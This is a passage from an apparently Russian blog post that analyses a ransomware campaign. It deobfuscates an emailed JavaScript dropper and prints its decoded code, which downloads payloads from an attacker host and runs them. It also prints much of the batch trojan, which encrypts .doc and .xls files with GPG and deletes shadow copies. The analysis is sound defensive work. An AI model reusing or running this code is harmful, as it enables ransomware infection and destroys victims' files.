Видно, что обфусцированный код содержится в четвертом параметре. Вначале идут упоминания переменных и функций, а затем — довольно объемная «портянка» — похоже, закодированная в Base64.



Хм. А что, если...




Bingo! У нас есть код. Прекрасный обфускатор использован, побольше бы таких. :)



NB:
Однако не всегда все так шоколадно. Буквально через несколько часов посыпалась другая рассылка: схожий текст письма, схожий js-файл во вложении — но там уже был применен другой обфускатор, без сладкой халявы в виде Base64.



Если интересно - он выглядел так:
// 59d3ce34148c30ca34d7c7a66638ae5c0292edd4c9c022663364f87adf190adc
//// cb138ea5c1bfe3ab5c876e3cb1582344
///// 0292edd4c9c022663364f87adf190adccb138ea5c1bfe3ab5c876e3cb15823445
eval(function(p,a,c,k,e,d){e=function(c){return(ca)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function()
// 59d3ce34148c30ca34d7c7a66638ae5c0292edd4c9c022663364f87adf190adc
///// 0292edd4c9c022663364f87adf190adccb138ea5c1bfe3ab5c876e3cb15823445
{return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1E 14=["\\18\\a\\I\\19\\A\\1y\\Z\\1y\\1l\\1l\\A\\15\\y\\a\\12\\U\\c\\V\\1s\\W\\a\\1t\\a\\g\\U\\c\\V\\1q\\18\\a\\G\\19\\12\\U\\A\\d\\M\\o\\A\\V\\1f\\I\\19\\G\\M\\n\\U\\I\\V\\15\\y\\a\\1d\\U\\c\\1f\\s\\V\\1s\\18\\a\\q\\19\\1t\\a\\12\\U\\A\\T\\M\\m\\A\\V\\1f\\b\\19\\U\\1t\\a\\g\\U\\A\\1r\\M\\L\\M\\1c\\M\\j\\A\\V\\V\\M\\R\\U\\A\\h\\A\\V\\15\\b\\M\\p\\19\\A\\O\\M\\P\\A\\15\\b\\M\\1a\\19\\c\\15\\b\\19\\b\\M\\f\\15\\q\\M\\u\\19\\16\\15\\q\\M\\10\\U\\V\\15\\q\\M\\1h\\U\\b\\V\\15\\q\\M\\v\\U\\s\\1f\\B\\V\\15\\q\\M\\Y\\U\\V\\1q\\y\\a\\X\\U\\c\\V\\1s\\G\\M\\N\\U\\c\\1f\\j\\1f\\j\\V\\1q\\1d\\U\\A\\17\\A\\1f\\A\\A\\1j\\I\\1j\\A\\D\\M\\i\\A\\V\\15\\X\\U\\A\\A\\1j\\I\\1j\\A\\D\\M\\i\\A\\V\\15","\\a","\\R\\m\\d\\i\\h","\\a\\a\\a\\k\\C\\I\\I\\a\\O\\c\\L\\a\\1d\\p\\n\\b\\h\\i\\T\\n\\a\\a\\v\\L\\g\\c\\h\\g\\1b\\q\\Z\\g\\b\\h\\a\\n\\g\\P\\a\\H\\Q\\j\\B\\a\\a\\a\\a\\a\\10\\b\\h\\i\\O\\g\\w\\1b\\q\\Z\\g\\b\\h\\a\\H\\Q\\j\\18\\a\\H\\Q\\16\\j\\a\\p\\m\\s\\c\\h\\g\\a\\Z\\R\\a\\h\\g\\o\\m\\a\\L\\g\\h\\p\\L\\n\\a\\x\\Q\\b\\L\\i\\m\\h\\a\\Q\\D\\g\\d\\d\\a\\N\\1a\\m\\c\\n\\s\\N\\n\\O\\i\\L\\T\\n\\o\\g\\n\\h\\Q\\h\\L\\i\\n\\X\\R\\a\\10\\Y\\1b\\Y\\1h\\a\\Q\\h\\L\\g\\c\\o\\a\\k\\R\\1a\\o\\d\\B\\a\\Y\\1b\\k\\Y\\T\\b\\p\\o\\g\\n\\h\\a\\b\\L\\g\\c\\h\\g\\N\\d\\g\\o\\g\\n\\h\\a\\h\\o\\m\\a\\s\\c\\h\\c\\C\\f\\m\\g\\a\\q\\i\\n\\a\\q\\c\\R\\g\\1c\\18\\a\\h\\g\\1a\\h\\a\\n\\T\\s\\g\\C\\f\\m\\g\\s\\r\\c\\d\\p\\g\\a\\C\\f\\m\\g\\a\\1b\\m\\g\\n\\a\\x\\L\\i\\h\\g\\a\\Q\\c\\O\\g\\C\\T\\17\\i\\d\\g\\a\\v\\d\\T\\R\\g\\a\\J\\p\\n\\a\\Y\\E\\m\\B\\z\\w\\11\\X\\Q\\d\\k\\P\\k\\u\\j\\i\\H\\w\\J\\d\\q\\w\\10\\d\\w\\17\\P\\i\\1b\\P\\j\\e\\l\\n\\r\\p\\z\\I\\J\\m\\q\\B\\18\\X\\E\\I\\H\\d\\z\\w\\J\\d\\C\\B\\H\\1r\\l\\x\\13\\j\\e\\t\\11\\m\\g\\I\\H\\d\\s\\1e\\r\\f\\q\\i\\1h\\p\\l\\w\\b\\X\\E\\x\\13\\j\\c\\w\\l\\d\\x\\N\\G\\i\\c\\o\\r\\Z\\s\\v\\D\\i\\e\\w\\j\\13\\v\\n\\l\\D\\b\\i\\1h\\e\\F\\u\\10\\f\\1k\\F\\13\\f\\l\\x\\17\\j\\l\\F\\G\\i\\c\\o\\r\\Z\\s\\v\\X\\i\\r\\16\\13\\Z\\b\\o\\d\\P\\s\\v\\y\\C\\c\\t\\r\\R\\q\\v\\11\\m\\1b\\P\\j\\e\\Q\\d\\k\\P\\k\\u\\16\\e\\F\\u\\10\\f\\K\\W\\r\\18\\b\\t\\17\\p\\l\\N\\r\\p\\s\\o\\d\\f\\q\\B\\y\\h\\l\\x\\y\\j\\F\\I\\J\\f\\c\\x\\y\\n\\b\\f\\D\\e\\F\\u\\10\\u\\e\\C\\R\\13\\v\\o\\l\\16\\q\\o\\13\\j\\c\\x\\G\\p\\11\\t\\m\\1r\\e\\t\\11\\R\\l\\v\\d\\12\\s\\o\\17\\f\\11\\t\\k\\G\\q\\o\\r\\I\\11\\N\\17\\Z\\s\\t\\d\\B\\l\\r\\D\\1k\\z\\o\\m\\d\\z\\I\\E\\T\\11\\W\\16\\C\\x\\N\\16\\k\\k\\i\\y\\z\\C\\F\\1a\\11\\r\\17\\J\\E\\11\\i\\W\\12\\z\\f\\y\\O\\b\\t\\r\\p\\e\\v\\H\\1e\\J\\r\\E\\i\\K\\t\\11\\R\\k\\v\\W\\12\\z\\f\\y\\u\\l\\x\\y\\W\\e\\v\\W\\12\\Y\\E\\m\\p\\l\\w\\b\\X\\E\\x\\13\\j\\c\\w\\l\\d\\x\\N\\G\\i\\c\\o\\r\\Z\\s\\v\\X\\i\\F\\B\\13\\f\\c\\w\\1h\\j\\c\\x\\y\\n\\K\\W\\l\\m\\q\\t\\r\\C\\g\\w\\13\\j\\l\\x\\16\\1k\\z\\o\\m\\d\\z\\I\\E\\i\\e\\C\\h\\B\\z\\w\\11\\X\\z\\C\\16\\p\\l\\w\\b\\X\\E\\x\\13\\j\\c\\w\\l\\d\\x\\N\\G\\i\\c\\o\\r\\Z\\s\\v\\X\\i\\E\\F\\J\\1k\\J\\N\\11\\p\\F\\I\\J\\f\\l\\x\\17\\h\\11\\i\\W\\12\\Y\\E\\m\\D\\K\\W\\G\\P\\l\\x\\18\\T\\e\\C\\h\\D\\K\\d\\J\\y\\b\\t\\F\\G\\k\\C\\h\\D\\K\\d\\s\\f\\c\\w\\J\\d\\e\\t\\k\\p\\F\\o\\r\\u\\b\\t\\G\\p\\b\\B\\r\\v\\q\\B\\J\\y\\e\\C\\h\\D\\K\\d\\1h\\O\\b\\B\\d\\j\\c\\x\\G\\p\\1k\\C\\10\\12\\z\\Q\\y\\C\\z\\w\\l\\d\\r\\t\\G\\t\\c\\x\\1a\\d\\e\\t\\E\\R\\k\\i\\W\\12\\z\\Q\\y\\Y\\q\\t\\G\\u\\l\\Q\\X\\m\\1d\\E\\j\\e\\c\\o\\T\\T\\H\\B\\D\\j\\s\\1e\\10\\1c\\K\\f\\G\\O\\b\\n\\r\\1c\\c\\t\\h\\O\\s\\i\\y\\p\\l\\w\\E\\O\\l\\t\\G\\Z\\K\\o\\13\\u\\b\\f\\b\\R\\H\\f\\b\\L\\Q\\d\\k\\P\\k\\f\\R\\n\\l\\t\\G\\Z\\K\\o\\J\\O\\z\\f\\b\\m\\1b\\P\\j\\e\\l\\n\\r\\p\\z\\I\\J\\m\\q\\B\\18\\X\\Q\\d\\k\\1a\\k\\Q\\D\\e\\F\\u\\N\\f\\e\\w\\h\\e\\F\\u\\10\\f\\K\\d\\H\\16\\q\\i\\D\\e\\F\\u\\N\\f\\K\\Y\\N\\R\\k\\v\\W\\12\\1d\\E\\j\\e\\s\\1e\\H\\y\\11\\1e\\h\\e\\F\\u\\N\\1a\\e\\v\\b\\n\\e\\j\\m\\C\\k\\Y\\k\\L\\H\\B\\J\\O\\z\\f\\y\\W\\q\\B\\k\\n\\e\\C\\h\\G\\Y\\E\\m\\Z\\z\\w\\J\\Z\\c\\v\\D\\e\\F\\u\\10\\P\\13\\f\\d\\12\\1d\\E\\j\\e\\l\\n\\r\\p\\z\\I\\J\\m\\q\\B\\18\\X\\Q\\d\\k\\1a\\k\\v\\D\\e\\F\\u\\N\\f\\e\\w\\h\\e\\F\\u\\10\\f\\K\\d\\H\\16\\q\\i\\D\\e\\F\\u\\N\\f\\K\\Y\\10\\R\\k\\v\\W\\12\\1d\\E\\j\\e\\c\\o\\T\\T\\H\\B\\D\\j\\s\\1e\\10\\1c\\K\\f\\G\\O\\b\\n\\r\\1c\\c\\t\\h\\O\\s\\i\\y\\p\\l\\w\\E\\O\\l\\t\\r\\u\\c\\x\\s\\p\\K\\o\\13\\u\\b\\f\\b\\R\\H\\f\\b\\L\\Q\\d\\k\\P\\k\\f\\R\\n\\l\\t\\r\\u\\c\\x\\s\\p\\K\\o\\13\\u\\b\\f\\b\\m\\1b\\P\\j\\e\\c\\o\\T\\T\\H\\B\\D\\j\\s\\1e\\10\\1c\\K\\f\\G\\O\\b\\n\\r\\1c\\c\\t\\h\\O\\s\\i\\y\\p\\l\\w\\E\\O\\c\\x\\y\\u\\k\\i\\y\\Z\\b\\I\\k\\n\\K\\v\\b\\n\\e\\j\\m\\C\\k\\Y\\k\\L\\H\\B\\d\\p\\b\\I\\J\\D\\q\\t\\P\\p\\z\\o\\17\\j\\H\\f\\W\\12\\Y\\E\\m\\e\\F\\u\\N\\P\\e\\v\\b\\n\\e\\j\\m\\C\\k\\Y\\k\\L\\H\\B\\d\\p\\b\\I\\J\\D\\q\\t\\P\\p\\z\\o\\17\\j\\H\\f\\W\\12","","\\1d\\L\\T\\o\\v\\D\\c\\L\\v\\T\\s\\g","\\L\\g\\m\\d\\c\\b\\g","\\1l\\P\\1j","\\1l\\q","\\X"];1F(1n(1m,1o,S,1i,1g,1u){1g=1n(S){1p(S<1o?14[4]:1g(1B(S/1o)))+(1C<(S%=1o)?1v[14[5]](S+1I):S.1A(1z))};1D(!14[4][14[6]](/^/,1v)){1x(;S--;){1u[1g(S)]=1i[S]||1g(S)};1i=[1n(S){1p 1u[S]}];1g=1n(){1p 14[7]};S=1};1x(;S--;){1i[S]&&(1m=1m[14[6]](1G 1H(14[8]+1g(S)+14[8],14[9]),1i[S]))};1p 1m}(14[0],1w,1w,14[3][14[2]](14[1]),0,{}));',62,107,'||||||||||x20|x63|x61|x6C|x4B|x79|x65|x74|x69|x30|x4D|x5A|x70|x6E|x6D|x75|x62|x56|x64|x47|x7A|x43|x58|x57|x35|x59|x22|x32|x54|x68|x51|x55|x39|x4A|x33|x52|x4C|x72|x2E|x45|x76|x77|x53|x73|_0x3283x3|x6F|x28|x29|x6B|x67|x44|x6A|x41|x49|x37|x4E|_0x32db|x3B|x31|x46|x34|x3D|x78|x4F|x36|x66|x48|x2C|_0x3283x5|x42|_0x3283x4|x2B|x50|x5C|_0x3283x1|function|_0x3283x2|return|x7D|x71|x7B|x38|_0x3283x6|String|42|for|x25|36|toString|parseInt|35|if|var|eval|new|RegExp|29'.split('|'),0,{})

// 59d3ce34148c30ca34d7c7a66638ae5c0292edd4c9c022663364f87adf190adc
//// cb138ea5c1bfe3ab5c876e3cb1582344
///// 0292edd4c9c022663364f87adf190adccb138ea5c1bfe3ab5c876e3cb15823445
)
// 59d3ce34148c30ca34d7c7a66638ae5c0292edd4c9c022663364f87adf190adc


Что же, это тоже легко можно расшифровать: открываем код в абсолютно любом текстовом редакторе, меняем eval() на console.log() и запускаем получившееся в JS-консоли броузера — например, в Firefox.



Само собой, такую же операцию можно провернуть и с исходным js-файлом из начала этой статьи.



Как-то так (кликабельно):




В нижней части экрана — интересующий нас код.



Весь код записан в одну строку. Чтобы привести его в читаемое состояние, в данном случае можно просто заменить ";" (точку с запятой) на ";\n" (точку с запятой и перенос строки).



Ну и вновь приправить форматированием.



Код, раскодирующий и запускающий ядро дроппера:
var MT33 = "%temp%\\";

function CreateObject(a){
return new ActiveXObject(a)
}
var JS02 = CreateObject("WScript.Shell"),
MT33 = JS02.ExpandEnvironmentStrings(MT33);

function JS04(a, d){
var b = new CreateObject("ADODB.Stream"),
c = (new ActiveXObject("Msxml2.DOMDocument.6.0")).createElement("tmp");
c.dataType = "bin.base64";
c.text = a;
c = c.nodeTypedValue;
b.Type = 1;
b.Open();
b.Write(c);
b.SaveToFile(d, 2);
b.Close()
}

function JS10(a){
JS02.Run(a, 0, 0)
}

JS04("DQp2YXIgSlMwMz0iJXRlbXAlXFwiOw0KZnVuY3Rpb24gQ3JlYXRlT2JqZWN0KGIpe3JldHVybiBuZXcgQWN0aXZlWE9iamVjdChiKX0NCnZhciBKUzAyPUNyZWF0ZU9iamVjdCgiV1NjcmlwdC5TaGVsbCIpOw0KSlMwMz1KUzAyLkV4cGFuZEVudmlyb25tZW50U3RyaW5ncyhKUzAzKTsNCmZ1bmN0aW9uIGpqKGIsZCl7dmFyIGM9bmV3IEFjdGl2ZVhPYmplY3QoIk1TWE1MMi5YTUxIVFRQIik7Yy5vcGVuKCJHRVQiLGIsMCk7Yy5zZW5kKCk7DQpuZXcgQWN0aXZlWE9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiKTt2YXIgYT1uZXcgQWN0aXZlWE9iamVjdCgiQURPREIuU3RyZWFtIik7DQphLk9wZW4oKTthLlR5cGU9MTthLldyaXRlKGMuUmVzcG9uc2VCb2R5KTthLlBvc2l0aW9uPTA7YS5TYXZlVG9GaWxlKGQsMik7YS5DbG9zZSgpfQ0KamooJ2h0dHA6Ly9vcnV6aGtvdi5uZXQvZG9jLmNzcycsJycrSlMwMysnZG9jLmRvYycpOw0KZnVuY3Rpb24gSlMxMShKUzEyKXtKUzAyLlJ1bihKUzEyLDEsMCk7fQ0KdHJ5IHtKUzExKCcnK0pTMDMrJ2RvYy5kb2MnKTt9DQpjYXRjaChKUzAwNyl7fQ0KZnVuY3Rpb24gSlMxMChKUzEyKXtKUzAyLlJ1bihKUzEyLDAsMCk7fQ0KamooJ2h0dHA6Ly9vcnV6aGtvdi5uZXQvZGVzaWduLmNzcycsJycrSlMwMysnZGVzaWduLmNzcycpOw0KamooJ2h0dHA6Ly9vcnV6aGtvdi5uZXQvaW5zLmNzcycsJycrSlMwMysnaW5zdGFsbC5iYXQnKTsNCkpTMTAoJycrSlMwMysnaW5zdGFsbC5iYXQnKTs=", "" + MT33 + "update.js");

JS10("" + MT33 + "update.js");


Код на удивление несложный: он получает путь к папке %temp%, затем раскодирует основную часть загрузчика (дроппера) из Base64 и помещает полученный код в файл %temp%\update.js. После этого вредоносный файл запускается на выполнение функцией WScript.Shell.Run().



P. S. Совершенно непонятно, зачем мы все это сейчас проделали — ведь у нас уже есть раскодированный код…



Ну ладно, пусть будет. :)





2. Анализ дроппера





Итак, мы успешно раскодировали из Base64 основной код дроппера.



Узрим же его!
var JS03 = "%temp%\\";

function CreateObject(b){
return new ActiveXObject(b)
}

var JS02 = CreateObject("WScript.Shell");

JS03 = JS02.ExpandEnvironmentStrings(JS03);

function jj(b, d){
var c = new ActiveXObject("MSXML2.XMLHTTP");
c.open("GET", b, 0);
c.send();
new ActiveXObject("Scripting.FileSystemObject");
var a = new ActiveXObject("ADODB.Stream");
a.Open();
a.Type = 1;
a.Write(c.ResponseBody);
a.Position = 0;
a.SaveToFile(d, 2);
a.Close()
}

jj('http://oruzhkov.net/doc.css','' + JS03 + 'doc.doc');

function JS11(JS12){
JS02.Run(JS12, 1, 0);
}

try {
JS11('' + JS03 + 'doc.doc');
}
catch(JS007){
}

function JS10(JS12){
JS02.Run(JS12, 0, 0);
}

jj('http://oruzhkov.net/design.css','' + JS03 + 'design.css');

jj('http://oruzhkov.net/ins.css','' + JS03 + 'install.bat');

JS10(''+JS03+'install.bat');


Код, опять-таки, весьма несложный; единственное, что немного напрягает, — это непонятные имена переменных. Общий смысл происходящего таков:


  • создать объект WScript;

  • получить полный путь к папке %temp%;

  • скачать с сервера злоумышленника файл doc.doc и сохранить его под тем же именем в папку %temp%;

  • попытаться открыть doc.doc;

  • скачать с сервера злоумышленника файл design.css и сохранить его под тем же именем в папку %temp%;

  • скачать с сервера злоумышленника файл ins.css и сохранить его под именем install.bat в папку %temp%;

  • запустить install.bat.



Образцы скачиваемых файлов можно скачать непосредственно с официального сайта дистрибьютора (уже недоступен) или взять здесь (должно быть доступно ближайшие пару месяцев, потом сотрется; пароль к архиву — «virus»).



Файл doc.doc — это, похоже, обычный документ MS Word (по крайней мере, навскидку ничего вредоносного я в нем не нашел). После открытия пользователь увидит следующее:



Ваша версия Word устарела!




Файл design.css — это на самом деле gpg.exe, утилита для шифрования сообщений и файлов.



А файл ins.css (install.bat) — это собственно главный исполняемый файл троянца.



3. Деобфускация исполняемого файла





Исходное содержимое файла install.bat приведено под спойлером. Кода довольно много (примерно 850 строк), так что этот спойлер лучше вообще не открывать — дальше будет приведена укороченная версия.



Код (850 строк мути):
echo uxqTUNgSeIQPIzvREL2BBpQKqgkAqK3RnG7HD15SZkPpEc3TNM
echo uxqTUNgSeIQPIzvREL2BBpQKqgkAqK3RnG7HD15SZkPpEc3TNM

@ECHO OFF

echo 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
echo VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
SetLocal EnableDelayedExpansion
echo SpEtra7rEphaGeVaChAbrukEstaGafra >nul
echo Waw6sw5TUPh7FustAh544brajEPUTrAb >nul
cd "%TEMP%"
if not exist "%temp%\9480bf43.76a94786" (
echo b4Ga5r573nErUJaHejudevuRuTaChUbr >nul
echo BeQedRu54GUtra5aYEdeseTe2R4wruv6 >nul
echo 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
echo VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
echo 871c371d > "%temp%\9480bf43.76a94786"
echo b4Ga5r573nErUJaHejudevuRuTaChUbr >nul
echo BeQedRu54GUtra5aYEdeseTe2R4wruv6 >nul
attrib +s +h "%temp%\9480bf43.76a94786"
echo sPE3as8pHaResW583YuwrUdraz4fraFr >nul
) else (
echo wra7ap4ve3rezUCufRamAQeJUPaste4A >nul
echo fr8chADr8phubuca4atHu7ebrezeXuc8 >nul
echo 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
echo VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
goto 871c371d
)
rename "%temp%\design.css" "gpg.exe"
copy /y "%temp%\design.css" "%temp%\gpg.exe"
del /f /q "%temp%\design.css"
echo fr8chADr8phubuca4atHu7ebrezeXuc8 >nul
echo nes2AzanaBU2AtaST4wUzEc5anAd5U5e >nul
echo pUprESPeResWaZuPrasw38eduzEBruzA >nul
chcp 866
set 715c7be3=!RANDOM!
set b67b5d00=!RANDOM!
echo yAphareSwu4UtAspetrukatRes84etha >nul
echo 3RAFaY8dUtremaserabAtr7MagEbrAd8 >nul
set dc841a88=!RANDOM!
set db5a2d8a=!RANDOM!
echo yAphareSwu4UtAspetrukatRes84etha >nul
echo 3RAFaY8dUtremaserabAtr7MagEbrAd8 >nul
set ee1f189d=!RANDOM!
set 2162ea2b=!RANDOM!
echo yAphareSwu4UtAspetrukatRes84etha >nul
echo 3RAFaY8dUtremaserabAtr7MagEbrAd8 >nul
set 58d179b8=!RANDOM!
set 3d645b52=RU
if exist "%APPDATA%\gnupg" RENAME "%APPDATA%\gnupg" gnupg_%random%
echo yAphareSwu4UtAspetrukatRes84etha >nul
echo 3RAFaY8dUtremaserabAtr7MagEbrAd8 >nul
echo Key-Type: RSA> "%temp%\9c668934.2ca1046c"
echo Key-Length: 1024>> "%temp%\9c668934.2ca1046c"
echo yAphareSwu4UtAspetrukatRes84etha >nul
echo 3RAFaY8dUtremaserabAtr7MagEbrAd8 >nul
echo Name-Real: Cellar>> "%temp%\9c668934.2ca1046c"
echo yAphareSwu4UtAspetrukatRes84etha >nul
echo 3RAFaY8dUtremaserabAtr7MagEbrAd8 >nul

"%temp%\gpg.exe" --batch --homedir "%temp%" --gen-key "%temp%\9c668934.2ca1046c"
echo CUdUbruTra6rafarafReduhepadraYug >nul
echo te6eVUW8e5eR5chUGachef4nu6r3xenU >nul
echo -----BEGIN PGP PUBLIC KEY BLOCK-----> "%temp%\03dfb98e.7087b06e"
echo CUdUbruTra6rafarafReduhepadraYug >nul
echo te6eVUW8e5eR5chUGachef4nu6r3xenU >nul
echo 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
echo VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
echo Version: GnuPG v1>> "%temp%\03dfb98e.7087b06e"
echo thefr4brUYe36aFrecHathePr7CAFanE >nul
echo trufufrecrututheg5prewrefeXaswe3 >nul
echo.>> "%temp%\03dfb98e.7087b06e"
echo thefr4brUYe36aFrecHathePr7CAFanE >nul
echo trufufrecrututheg5prewrefeXaswe3 >nul
echo mI0EVbFePwEEAMM+eRmPkcVTTwqLOyCkSlOTDjfnJpU2vTt94yMq1c1Ix1RF2fxp>> "%temp%\03dfb98e.7087b06e"
echo thefr4brUYe36aFrecHathePr7CAFanE >nul
echo trufufrecrututheg5prewrefeXaswe3 >nul
echo S9ZDuQ9qfhqUxXiUtsEY7kB1pHtcyCeqtdrYST4YzJTeNCZNTiq2mVkQlPXqcvO/>> "%temp%\03dfb98e.7087b06e"
echo hXpyYH/DNB6XmdQP9rmb/gIb5qHpRNoWlb1MBDZAJnHU3PEA2LcXbBX/ABEBAAG0>> "%temp%\03dfb98e.7087b06e"
echo ClZhdWx0Q3J5cHSIuAQTAQIAIgUCVbFePwIbLwYLCQgHAwIGFQgCCQoLBBYCAwEC>> "%temp%\03dfb98e.7087b06e"
echo thefr4brUYe36aFrecHathePr7CAFanE >nul
echo trufufrecrututheg5prewrefeXaswe3 >nul
echo HgECF4AACgkQ+Zg2Eii5y+eiQQQAm9r0sfXO5pp4/yy6lJG+zZAiijgzECVAQvw9>> "%temp%\03dfb98e.7087b06e"
echo j+JE6n7mZnZDm632PrLumTHE9PauifXmyTFf0RPUI/D5B8QFPQn9hoNf041aaEgq>> "%temp%\03dfb98e.7087b06e"
echo thefr4brUYe36aFrecHathePr7CAFanE >nul
echo trufufrecrututheg5prewrefeXaswe3 >nul
echo bTQSy7TIwZJfTyZyq/yhJiH0RLI7yhj/88sjX+uu7miGHO9jb1ygTo/qe5n3Q/Vp>> "%temp%\03dfb98e.7087b06e"
echo xpSJJFU=>> "%temp%\03dfb98e.7087b06e"
echo PreQ3baxuwuP42EX2tepeTra5rA6eN4C >nul
echo ZewrU5u8A4A8Ra5He2heXeWr6bRuzePU >nul
echo =CuiR>> "%temp%\03dfb98e.7087b06e"
echo -----END PGP PUBLIC KEY BLOCK----->> "%temp%\03dfb98e.7087b06e"
echo PreQ3baxuwuP42EX2tepeTra5rA6eN4C >nul
echo ZewrU5u8A4A8Ra5He2heXeWr6bRuzePU >nul

"%temp%\gpg.exe" -r Cellar --export-secret-keys --yes --homedir "%temp%" -a> "%temp%\3637bf69.36ddf8fe"
del /f /q "%temp%\9c668934.2ca1046c"
echo PreQ3baxuwuP42EX2tepeTra5rA6eN4C >nul
echo ZewrU5u8A4A8Ra5He2heXeWr6bRuzePU >nul
echo.>> "%temp%\3637bf69.36ddf8fe"
echo BDATE: !DATE!>> "%temp%\3637bf69.36ddf8fe"
echo PreQ3baxuwuP42EX2tepeTra5rA6eN4C >nul
echo ZewrU5u8A4A8Ra5He2heXeWr6bRuzePU >nul
echo UNAME: !USERNAME!>> "%temp%\3637bf69.36ddf8fe"
echo CNAME: !COMPUTERNAME!>> "%temp%\3637bf69.36ddf8fe"
echo PQQID: AKG-4813>> "%temp%\3637bf69.36ddf8fe"
echo ULANG: !3d645b52!>> "%temp%\3637bf69.36ddf8fe"
echo PreQ3baxuwuP42EX2tepeTra5rA6eN4C >nul
echo ZewrU5u8A4A8Ra5He2heXeWr6bRuzePU >nul
echo 01HSH: !715c7be3!>> "%temp%\3637bf69.36ddf8fe"
echo 02HSH: !b67b5d00!>> "%temp%\3637bf69.36ddf8fe"
echo 03HSH: !db5a2d8a!>> "%temp%\3637bf69.36ddf8fe"
echo PreQ3baxuwuP42EX2tepeTra5rA6eN4C >nul
echo ZewrU5u8A4A8Ra5He2heXeWr6bRuzePU >nul
echo 04HSH: !dc841a88!>> "%temp%\3637bf69.36ddf8fe"
echo 05HSH: !ee1f189d!>> "%temp%\3637bf69.36ddf8fe"
echo PreQ3baxuwuP42EX2tepeTra5rA6eN4C >nul
echo ZewrU5u8A4A8Ra5He2heXeWr6bRuzePU >nul
echo FHASH: !2162ea2b!>> "%temp%\3637bf69.36ddf8fe"
echo chcp 866 > "%temp%\61231f25.9db8b89a"
echo 3ekudesewekePrUBreqAcrabrastUCHu >nul
echo spEfAch6gaCHetHuMEM2fUgexuj27rAS >nul
FOR %%f IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :1010f32d %%f
echo if exist "%%TeMp%%\VAULT.KEY" echo 01FNSH-OK^>^> "%%TeMp%%\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
echo 3ekudesewekePrUBreqAcrabrastUCHu >nul
echo spEfAch6gaCHetHuMEM2fUgexuj27rAS >nul
echo if exist "%%AppDATA%%\VAULT.KEY" echo 01FNSH-OK^>^> "%%AppDATA%%\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
echo if exist "%%USERPROFILE%%\Desktop\VAULT.KEY" echo 01FNSH-OK^>^> "%%USERPROFILE%%\Desktop\VAULT.KEY">> "%temp%\61231f25.9db8b89a"
goto 441f5342
echo 3wucHePReXafUtHex5s2FeyU4efugaza >nul
echo nUFaw6hSdgyahjdgahjdiuaerEkam5 >nul
echo jureqAprE8Anap2AxED7Et4ucHathaZU >nul
:1010f32d
dir /B "%1:\"&& for /r "%1:\" %%i in (*.xls *.doc) do (
echo "%%TeMp%%\gpg.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\61231f25.9db8b89a"
echo %%i>> "%temp%\21b0fb7b.7ca0ec0c"
)
goto:eof
echo 3wucHePReXafUtHex5s2FeyU4efugaza >nul
echo nUFaw6hSdgyahjdgahjdiuaerEkam5 >nul
echo jureqAprE8Anap2AxED7Et4ucHathaZU >nul
:441f5342
echo Set objShell = CreateObject^("Shell.Application"^) > "%temp%\59665d79.vbs"
echo 3wucHePReXafUtHex5s2FeyU4efugaza >nul
echo nUFaw6hSdgyahjdgahjdiuaerEkam5 >nul
echo jureqAprE8Anap2AxED7Et4ucHathaZU >nul
echo Set objWshShell = WScript.CreateObject^("WScript.Shell"^) >> "%temp%\59665d79.vbs"
echo 3wucHePReXafUtHex5s2FeyU4efugaza >nul
echo nUFaw6hSdgyahjdgahjdiuaerEkam5 >nul
echo jureqAprE8Anap2AxED7Et4ucHathaZU >nul
echo Set objWshProcessEnv = objWshShell.Environment^("PROCESS"^) >> "%temp%\59665d79.vbs"
echo 3wucHePReXafUtHex5s2FeyU4efugaza >nul
echo nUFaw6hSdgyahjdgahjdiuaerEkam5 >nul
echo jureqAprE8Anap2AxED7Et4ucHathaZU >nul
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\59665d79.vbs"
echo var cdp="%%TEMP%%\\69aca909.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');> "%temp%\acda3f33.js"
echo 9kYTla1Z2v4RqBIe7bMIphoN3yZ6zJ9z21bn1NK3CN4TBuBPkb
echo VwmmrE52cmWxWNq5CiI2cHZHMRSewEE0uq254wS5VjlQNunrBY
echo 3wucHePReXafUtHex5s2FeyU4efugaza >nul
echo nUFaw6hSdgyahjdgahjdiuaerEkam5 >nul
echo jureqAprE8Anap2AxED7Et4ucHathaZU >nul
echo.> "%temp%\69aca909.cmd"
echo SetLocal EnableDelayedExpansion>> "%temp%\69aca909.cmd"
echo 3wucHePReXafUtHex5s2FeyU4efugaza >nul
echo nUFaw6hSdgyahjdgahjdiuaerEkam5 >nul
echo jureqAprE8Anap2AxED7Et4ucHathaZU >nul
echo for /f "tokens=2*" %%%%i in ^('reg.exe query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentVersion"'^) do set fnd7=%%%%j>> "%temp%\69aca909.cmd"
echo 3wucHePReXafUtHex5s2FeyU4efugaza >nul
echo nUFaw6hSdgyahjdgahjdiuaerEkam5 >nul
echo jureqAprE8Anap2AxED7Et4ucHathaZU >nul
echo if not %%fnd7:~0,1%% GEQ 6 goto a3811a18>> "%temp%\69aca909.cmd"
